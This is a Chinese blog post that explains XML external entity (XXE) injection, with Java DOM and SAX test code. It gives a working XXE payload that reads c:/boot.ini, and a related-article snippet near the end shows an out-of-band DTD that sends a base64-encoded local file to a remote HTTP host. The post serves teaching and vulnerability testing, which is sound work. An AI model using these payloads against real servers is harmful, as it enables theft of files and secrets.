Xml实体注入漏洞的一些测试和总结

最新推荐文章于 2024-08-16 17:40:16 发布
最新推荐文章于 2024-08-16 17:40:16 发布
阅读量6.8k 收藏 4
点赞数 2
分类专栏: xml 文章标签: xml 测试 string exception file attributes
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Arno2013/article/details/7224487
版权
Xml实体注入漏洞的一些总结
1、 xml实体注入原理 

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>




<!--define DTD -->
<!--
引入外部DTD,也可以包含文件,不过并不能读取全部信息
<!DOCTYPE movies SYSTEM "file:///c:/boot.ini">
-->


<!--内部DTD申明-->
<!DOCTYPE root[
<!ENTITY arno SYSTEM "http://127.0.0.1/xml/read.txt">
<!ENTITY boot SYSTEM "file:///c:/boot.ini">
<!ELEMENT hackers (#PCDATA)>
]>


<root>
<hackers>
&arno; is readed from read.txt
&boot; is readed from file 
</hackers>
</root>




&xxx;表示xxx是xml的一个实体,其值为xml内部定义,文件中&arno;和&boot;是实体,并且DTD定义实体内容来自于外部文件和URL网络资源,在解析到时候解析器一般会读取其真实值显示。类似于&,<>等都需要进行转义,&nbsp;即转义为空格,&lt; 转义为<, &gt;转义为>。


除了俗成约定之外的实体,其他实体需要在xmlDTD申明中指明实体,否则将出现错误,另外xml 规范 DTD可以在xml内部定义,也可以在xml外部引入。




Xml实体 可以指定为外部http文件,也可以指定为内部文件系统,当指定为本地文件的时候,则出现了xml实体注入漏洞。


2、 漏洞的一般利用
上传或者控制一个xml文件,让服务器端去解析该文件,既可以读取服务器端文件内容。




3、 进一步测试:

Php语言大牛已经说过了,simplexml_load_file的xml文件读取组件存在该漏洞,其他语言JAVA(DOM、SAX读取xml文件)、ASP我测试过依然存在该漏洞,但是在测试JAVA的时候,如果引入的外部内容中含有xml特殊字符,则会出现解析错误,不一定能正确读取到服务端文件。



一些相应测试代码:

try{ 
		File f=new File("C:\\xampp\\htdocs\\xml\\text.xml");
		DocumentBuilderFactory factory=DocumentBuilderFactory.newInstance();
		DocumentBuilder builder=factory.newDocumentBuilder();
		Document doc = builder.parse(f);
		NodeList nl = doc.getElementsByTagName("hackers");
		for (int i=0;i < nl.getLength() ;i++){
		System.out.print("value:" + nl.item(i).getFirstChild().getNodeValue());

		} 
		}catch(Exception e){ 
		e.printStackTrace();
		} 

public class SaxXmlReader extends DefaultHandler {
	
	java.util.Stack tags = new java.util.Stack(); 

	public SaxXmlReader() { 
	super(); 
	} 

	public static void main(String args[]) { 
	long lasting = System.currentTimeMillis(); 
	try { 
	SAXParserFactory sf = SAXParserFactory.newInstance(); 
	SAXParser sp = sf.newSAXParser(); 
	SaxXmlReader reader = new SaxXmlReader(); 
	sp.parse(new InputSource("C:\\xampp\\htdocs\\xml\\text.xml"), reader); 
	} catch (Exception e) { 
	e.printStackTrace(); 
	} 
	System.out.println("运行时间:" + (System.currentTimeMillis() - lasting) + " 毫秒"); 
	} 

	public void characters(char ch[], int start, int length) throws SAXException { 
	String tag = (String) tags.peek(); 
	if (tag.equals("hackers")) { 
	System.out.print("Value:" + new String(ch, start, length)); 
	} 

	} 

	public void startElement( 
	String uri, 
	String localName, 
	String qName, 
	Attributes attrs) { 
	tags.push(qName); 
	} 

}


Arno2013
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XML外部实体注入漏洞(一)
记录并分享学习安全的知识点..
06-29 274
XXE注入也是XML注入的一部分,但相较于普通的XML注入,XXE注入的攻击面更广,危害更大。 XXE注入(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,所注入的对象就是我们实验任务一中提到的重点: XML外部实体。当遇见能够解析XML内容的页面时,如果能注入外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面。......
Journyx soap_cgi.pyc接口XML外部实体注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-09 310
Journyx项目管理软件 soap_cgi.pyc接口存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
XML外部实体注入(XXE)
web1的博客
09-08 514
关键利用点:外部实体 XML是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的义的 xxe 实体进行了引用 相关实验 1、利用外部实体来检索文件 1.1 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 1.2 在 XML 声明和stockCheck元素之间插入以下外部实体定义: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "fil
XML 外部实体注入
2201_75370376的博客
06-22 978
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
提供xml外部实体注入攻击的详细解说
qq_38140936的博客
07-08 975
常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置。常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置。如果程序中不对解析实体做限制的话,可以通过少量的DTD定义,实现海量大小的解析结果的效果,会大量占用服务器的处理、存储。通过构造特定格式的xml文档,读取服务器上指定文件的内容,达到敏感信息获取的目的。
【burpsuite安全练兵场-服务端10】XML外部实体注入(XXE注入)-9个实验(全)
m0_59598029的博客
03-19 1001
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
34-XXE(XML外部实体注入
XLbb的博客
05-19 957
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
Web Hacking 101 中文版 十四、XML 外部实体注入(一)
热门推荐
龙哥盟
03-25 3万+
十四、XML 外部实体注入 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 XML 外部实体(XXE)漏洞涉及利用应用解析 XML 输入的方式,更具体来说,应用程序处理输入中外部实体的包含方式。为了完全理解理解如何利用,以及他的潜力。我觉得我们最好首先理解什么是 XML 和外部实体。元语言是用于描述其它语言的语言,这就是 XML。它在 H
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
Apache solr XML 实体注入漏洞(CVE-2017-12629)
weixin_50341025的博客
04-23 530
漏洞原理与分析可以参考: https://www.exploit-db.com/exploits/43009/ https://paper.seebug.org/425/ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞XML实体扩展漏洞(XXE)和远程命
95.网络安全渗透测试—[常规漏洞挖掘与利用篇11]—[XXE(XML外部实体)注入漏洞测试]
qwsn
02-03 2666
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、XXE注入 1、相关概念 (1)XXE定义: (2)漏洞版本: (3)相关概念: 2、漏洞示例:`有回显的XXE注入` (1)靶机环境:本地的phpstudy-`php5.4.5` (2)漏洞页面源码:`xxe01.php` (3)查看libxml版本:`2.7.8<2.9` (4)任意读取文件:`file://伪协议` (5)利用伪协议读取文件:`php的filter伪协议` (5)扫描端口:`单线程` (6)执行
利用 XML 外部实体注入
blacklordking的博客
06-21 410
在现实生活中大量存在有关系的数据,XML语言出现的根本目标在于描述在现实生活中经常出现的有关系的数据。在XML语言中,它允许用户自定义标签。一个标签用于描述一段数据;一个标签可分为开始标签和结束标签,在开始标签和结束标签之间,又可以使用其它标签描述其它数据,以此来实现数据关系的描述。(在XML中,用ELEMENT表示元素,用ENTITY表示实体
XML外部实体注入
最新发布
2201_75572825的博客
08-16 1475
比如下面这个插入了“<”符号,解析器会把它当作新元素的开始,就会产生错误,为了避免这个错误,我们可以用实体引用来替代这些特殊的字符。其中,entity-name是参数实体的名称,entity-value 是参数实体的值。在这个例子中,定义了一个名为author的内部实体,它的实际内容是John Smith,在xml文档中,通过&author进行引用,并将其替换为实际内容。而在DTD中,实体是一种可以被引用的数据类型,它可以用来代替特定的字符,字符串,符号等,从而使DTD更加灵活和易于维护。
XML外部实体注入——XXE漏洞详解
Gefangenes的博客
07-02 2115
首先要了解什么是XXE漏洞,首先应该了解一下什么是XMLXML(可扩展标记语言,英文全称:eXtensible Markup Language)是一种用于描述数据结构和交换数据的标记语言。XML是一种非常灵活的语言,可以用于描述各种类型的数据,如文档、图像、音频、视频等。这个解释太官方,我们可以将xml语言和html对比着再来解释一下1>xml仅仅是纯文本,他不会做任何事情2>xml可以自己发明标签(允许定义自己的标签和文档结构)3>专门用来存放传输数据的东西。
xml外部实体注入(XXE)
songbai220
12-10 322
XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.0.105:8080?p=%file;'>"> 运维人
XXE(xml外部实体注入
今天也要加油鸭
03-13 2180
一、什么是xml 二、漏洞原理 三、攻击方式 四、危害 五、如何防御
XML 外部实体注入---XXE
Hi~ 土拨鼠
12-29 576
文章目录XML介绍及用途XML语法规则XML元素介绍XML DTD介绍DTD 声明类型DTD 数据类型DTD 实体介绍XML 注入(XXE)产生的原理简单的XXE 漏洞代码编写file_get_contents()函数php封装协议---php://inputsimplexml_load_string()函数XML 注入回显 输出函数XXE 漏洞利用任意文件读取 XML介绍及用途 XML 被设计用来传输和存储数据。XML文档形成了一种树结构,它从"根部"开始,然后扩展到"枝叶"。 XML 允许创作者定义自己
xxe-xml外部实体注入
nigo134的博客
07-27 2966
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
XXE漏洞详解:XML语法、攻防策略与实战示例
XXE全称XML External Entity Injection,即XML外部实体注入攻击,是针对XML文档处理中的一种严重安全漏洞。它源于对XML语法规则的不当使用,特别是当系统处理包含外部实体引用的不安全输入时,可能导致数据泄露或...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值